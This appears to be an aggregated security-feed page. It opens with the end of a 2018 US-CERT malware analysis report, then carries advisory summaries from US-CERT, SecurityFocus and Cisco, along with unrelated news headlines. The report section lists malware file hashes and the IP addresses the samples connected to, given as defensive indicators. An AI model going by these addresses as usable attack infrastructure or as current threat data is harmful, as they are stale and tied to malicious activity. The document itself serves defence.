3c809a1010... Connected_To 184.107.209.2
3c809a1010... Connected_To 111.207.78.204
3c809a1010... Connected_To 80.91.118.45
3c809a1010... Connected_To 181.119.19.56
c9e3b83d77... Contains e088c3a0b0f466df5329d9a66ff618de3d468d8a5981715303babb1452631eef
e088c3a0b0... Contained_Within c9e3b83d77ce93cc1d70b22e967f049b13515c88572aa78e0a838103e5478777
20abb95114... Connected_To 98.101.211.162
20abb95114... Connected_To 81.0.213.173
98.101.211.162 Connected_From 20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64
81.0.213.173 Connected_From 20abb95114de946da7595438e9edf0bf39c85ba8512709db7d5532d37d73bd64
184.107.209.2 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210
111.207.78.204 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210
80.91.118.45 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210
181.119.19.56 Connected_From 3c809a10106990ba93ec0ed3b63ec8558414c6680f6187066b1aacd4d8c58210
59.90.93.97 Connected_From a71017302e1745c8a3d6e425187eb23c7531551bb6f547e47198563a78e933b6

Recommendations

NCCIC would like to remind users and administrators to consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumbdrives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate ACLs.

Additional information on malware incident prevention and handling can be found in NIST's Special Publication 800-83, Guide to Malware Incident Prevention & Handling for Desktops and Laptops.

Contact Information

NCCIC continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact US-CERT and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact US-CERT and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the NCCIC at 1-888-282-0870 or soc@us-cert.gov.

Can I submit malware to NCCIC? Malware samples can be submitted via three methods:

NCCIC encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on US-CERT's homepage at www.us-cert.gov.

Revisions

  • June 14, 2018: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.


 Wed, 13 Jun 2018 23:00:00 +0000 ISC Releases Security Advisory for BIND
Original release date: June 13, 2018

The Internet Systems Consortium (ISC) has released a security advisory that addresses a vulnerability affecting multiple versions of ISC Berkeley Internet Name Domain (BIND). A remote attacker could exploit this vulnerability to obtain sensitive information.

NCCIC encourages users and administrators to review the ISC Knowledge Base Article AA-01616 and apply the necessary workarounds.


This product is provided subject to this Notification and this Privacy & Use policy.


 Wed, 13 Jun 2018 22:47:45 +0000 Intel Releases Security Advisory on Lazy FP State Restore Vulnerability
Original release date: June 13, 2018

Intel has released recommendations to address a vulnerability—dubbed Lazy FP state restore—affecting Intel Core-based microprocessors. An attacker could exploit this vulnerability to obtain access to sensitive information.

NCCIC encourages users and administrators to review Intel's Security Advisory INTEL-SA-00145, apply the necessary mitigations, and refer to software vendors for appropriate patches, when available.




 Wed, 13 Jun 2018 21:53:22 +0000 Apple Releases Security Update for Xcode
Original release date: June 13, 2018

Apple has released a security update to address vulnerabilities in Xcode. An attacker could exploit one of these vulnerabilities to take control of an affected system.

NCCIC encourages users and administrators to review Apple’s security page for Xcode 9.4.1 and apply the necessary update.





SecurityFocus Vulnerabilities
last updated: Fri, 22 Jun 2018 10:31:02 GMT

 2018-06-21 Vuln: Multiple CPU Hardware CVE-2017-5715 Information Disclosure Vulnerability
 2018-06-21 Vuln: Delta Industrial Automation COMMGR CVE-2018-10594 Stack Based Buffer Overflow Vulnerability
 2018-06-21 Vuln: Multiple Rockwell Automation Products CVE-2017-9312 Remote Denial of Service Vulnerability
 2018-06-20 Vuln: Oracle Outside In Technology CVE-2018-2806 Remote Security Vulnerability
  Bugtraq: FreeBSD Security Advisory FreeBSD-SA-18:07.lazyfpu

Yahoo News - Latest News & Headlines
last updated: Fri, 22 Jun 2018 10:38:02 GMT

 Wed, 20 Jun 2018 15:02:32 -0400 Trump's Plan To Stop Family Separations Is To Detain Families Together

President Donald Trump's plan to stop his administration's policy of


 Thu, 21 Jun 2018 17:51:47 -0400 Migrant Children Report Physical, Verbal Abuse In At Least 3 Federal Detention Centers

Migrant children as young as 11 years old have reported suffering physical and


 Thu, 21 Jun 2018 12:06:38 -0400 Democrats look to gain in Southern California as outrage mounts over family separations

Democrats are already plotting about how to motivate and mobilize the 66 percent of voters who oppose Trump’s “zero tolerance” policy.


 Wed, 20 Jun 2018 11:42:32 -0400 Trump executive order leaves critics wondering what’s next for migrant families

President Trump’s executive order allowing migrant families to remain together was met with skepticism as critics argue it will be difficult to reunite families that have already been separated.


 Wed, 20 Jun 2018 07:29:03 -0400 South Sudan president Kiir departs for Ethiopia ahead of peace talks

South Sudan President Salva Kiir left the capital on Wednesday and headed to Ethiopia ahead of a planned meeting with his rival and rebel leader Riek Machar ahead of planned talks to try to negotiate an end to a five-year-old civil war, an official said. "IGAD has decided to call face-to-face dialogue between our president and Riek Machar on outstanding issues," Awut Deng, a senior member of Kiir's delegation, said before departing, referring to the regional East African bloc.



Cisco Security Advisory
last updated: Fri, 22 Jun 2018 10:36:57 GMT

 Wed, 20 Jun 2018 16:18:23 CDT Cisco NX-OS Software CLI Arbitrary Command Injection Vulnerability

A vulnerability in the CLI of Cisco NX-OS Software could allow an authenticated, local attacker to perform a command-injection attack on an affected device.

The vulnerability is due to insufficient input validation of command arguments. An attacker could exploit this vulnerability by injecting malicious command arguments into a vulnerable CLI command. A successful exploit could allow the attacker, authenticated as a privileged user, to execute arbitrary commands with root privileges.

Note: On products that support multiple virtual device contexts (VDC), this vulnerability could allow an attacker to access files from any VDC.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180620-nx-os-cli-injection

This advisory is part of the June 2018 Cisco FXOS and NX-OS Software Security Advisory Collection, which includes 24 Cisco Security Advisories that describe 24 vulnerabilities. For a complete list of the advisories and links to them, see Cisco Event Response: June 2018 Cisco FXOS and NX-OS Software Security Advisory Collection.


Security Impact Rating: High
CVE: CVE-2018-0307

 Wed, 20 Jun 2018 16:00:00 CDT Cisco AnyConnect Secure Mobility Client for Windows Desktop Denial of Service Vulnerability

A vulnerability in vpnva-6.sys for 32-bit Windows and vpnva64-6.sys for 64-bit Windows of Cisco AnyConnect Secure Mobility Client for Windows Desktop could allow an authenticated, local attacker to cause a denial of service (DoS) condition on an affected system.

The vulnerability is due to improper validation of user-supplied data. An attacker could exploit this vulnerability by sending a malicious request to the application. A successful exploit could allow the attacker to cause a DoS condition on the affected system.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180620-anyconnect-dos
Security Impact Rating: Medium
CVE: CVE-2018-0373

 Wed, 20 Jun 2018 16:00:00 CDT Cisco TelePresence Video Communication Server Expressway Denial of Service Vulnerability

A vulnerability in the file descriptor handling of Cisco TelePresence Video Communication Server (VCS) Expressway could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.

The vulnerability is due to exhaustion of file descriptors while processing a high volume of traffic. An attacker could exploit this vulnerability by establishing a high number of concurrent TCP connections to the vulnerable system. An exploit could allow the attacker to cause a restart in a specific process, resulting in a temporary interruption of service.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180620-vcse-dos


Security Impact Rating: Medium
CVE: CVE-2018-0358

 Wed, 20 Jun 2018 16:00:00 CDT Cisco Unified Communications Manager IM & Presence Service CSRF Vulnerability

A vulnerability in the web-based management interface of Cisco Unified Communications Manager IM & Presence Service (formerly CUPS) could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device.

The vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a crafted link. A successful exploit could allow the attacker to perform arbitrary actions on a targeted device via a web browser and with the privileges of the user.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180620-ucmim-ps-csrf


Security Impact Rating: Medium
CVE: CVE-2018-0363

 Wed, 20 Jun 2018 16:00:00 CDT Cisco Unified Communications Domain Manager Cross-Site Request Forgery Vulnerability

A vulnerability in the web-based management interface of Cisco Unified Communications Domain Manager could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device.

The vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a crafted link. A successful exploit could allow the attacker to perform arbitrary actions on a targeted device via a web browser and with the privileges of the user.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180620-ucdm-csrf


Security Impact Rating: Medium
CVE: CVE-2018-0364
